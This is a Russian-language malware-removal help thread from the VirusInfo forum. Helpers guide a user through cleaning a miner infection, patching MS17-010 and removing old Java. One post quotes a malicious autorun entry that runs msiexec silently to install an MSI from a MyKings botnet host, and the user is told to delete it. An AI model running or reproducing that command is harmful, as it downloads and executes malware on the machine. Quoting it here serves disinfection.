Показано с 1 по 8 из 8.

"Mysa" и "ok" в автозагрузке + проблемы с сетью (заявка № 214674)

  1. #1
    Junior Member Репутация
    Регистрация
    15.08.2017
    Сообщений
    7
    Вес репутации
    30

    Thumbs up "Mysa" и "ok" в автозагрузке + проблемы с сетью

    Здравствуйте!

    Возникли проблемы. Судя по всему, "Avast" пропустил какую-то бяку:
    - количество запущенных процессов зашкаливает;
    - в автозагрузке числились неизвестные 4 задачи с названием "Mysa", а также какой-то "ok";
    - что-то активно съедает трафик, т.к. работа в сети сильно затруднена.

    Предварительно чистил, но я в этом не спец. Поэтому прошу вашей помощи, ребята.
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    384
    Уважаемый(ая) n1x3r, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,573
    Вес репутации
    1086
    Запустите HijackThis, расположенный в папке Autologger и пофикситеWindows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):
    Код:
    O4 - HKLM\..\Run: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q
    Устраняйте уязвимость, которую используют в т. ч. нашумевшие шифровальщики WannaCry и Petya - MS17-010: Описание обновления безопасности для Windows SMB Server срочно устанавливайте, причём на всех компьютерах в сети, если их несколько. Иначе не избавитесь от майнера.

    Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
    WBR,
    Vadim

  5. Это понравилось:


  6. #4
    Junior Member Репутация
    Регистрация
    15.08.2017
    Сообщений
    7
    Вес репутации
    30
    Спасибо за ответ!

    Вроде бы все сделал. Службы безопасности "Винды" обновил сразу перед запросом, почитав на вашем форуме информацию с подобной проблемой.
    Архив прикрепил и ожидаю дальнейших инструкций.
    Вложения Вложения

  7. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,573
    Вес репутации
    1086
    Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):
    Код:
    ;uVS v4.0.9 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    regt 25
    deltmp
    apply
    restart
    Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
    Компьютер перезагрузится.

    В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

    Удалите все установленные версии Java, они устаревшие и со множеством критических уязвимостей.
    Если Java вообще нужна для каких- либо приложений, игр (и Вы точно знаете, для каких именно) - установите Java 8 Update 141.
    Учтите, что 64-bit версия Java нужна только для очень ограниченного круга приложений.

    Сообщите, что с проблемой.
    WBR,
    Vadim

  8. Это понравилось:


  9. #6
    Junior Member Репутация
    Регистрация
    15.08.2017
    Сообщений
    7
    Вес репутации
    30
    Спасибо! Сделал и прикрепляю вам архив.

    По поводу "Java" понял - поправлю. С ситуацией не понятно - продолжаю за ней наблюдать. Трафик вроде бы не скачет и работа нормализовалась еще перед запросом, когда чистил самостоятельно. Плюс в "планировщике" ничего сомнительного с того момента не появлялось.

    И тем не менее, меня все также смущает количество процессов в диспетчере задач: их очень много, а если отключить галку "Отображать процессы всех пользователей" то можно решить, что это не обычный домашний компьютер, а какая-то локальная сеть. Некоторые процессы дублируются и, например, svchost насчитал вообще 10 шт. (3 шт. - система, 3 шт. - Network Service, а остальные - Local Service).

    Развейте мои сомнения, пожалуйста, или подтвердите опасения, а то скоро стану параноиком.

    P.S. Wi-fi отсутствует - кабельная проводка и поэтому сторонних подключений быть не может.
    Вложения Вложения
    Последний раз редактировалось n1x3r; 17.08.2017 в 20:12.

  10. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,573
    Вес репутации
    1086
    Если коротко - всё в порядке. Просто раньше на процессы так пристально не смотрели.
    WBR,
    Vadim

  11. Это понравилось:


  12. #8
    Junior Member Репутация
    Регистрация
    15.08.2017
    Сообщений
    7
    Вес репутации
    30
    Вас понял, спасибо! В таком случае, если все чисто и хвостов нет, от души благодарю за консультативную поддержку и проверку "железяки".

    Искренне желаю процветания вашему проекту и попутного ветра во все паруса - с меня причитается, ребята!

  • Уважаемый(ая) n1x3r, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Проблемы с сетью.
      От skulkyr в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 15.05.2011, 16:08
    2. Проблемы с сетью
      От smotrowoi в разделе Помогите!
      Ответов: 19
      Последнее сообщение: 21.06.2010, 14:17
    3. Проблемы с сетью.
      От batment83 в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 03.12.2009, 22:28
    4. Проблемы с сетью
      От IvanR в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 13.10.2009, 12:00
    5. проблемы с сетью
      От arturchik в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 05.02.2009, 18:30

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01591 seconds with 19 queries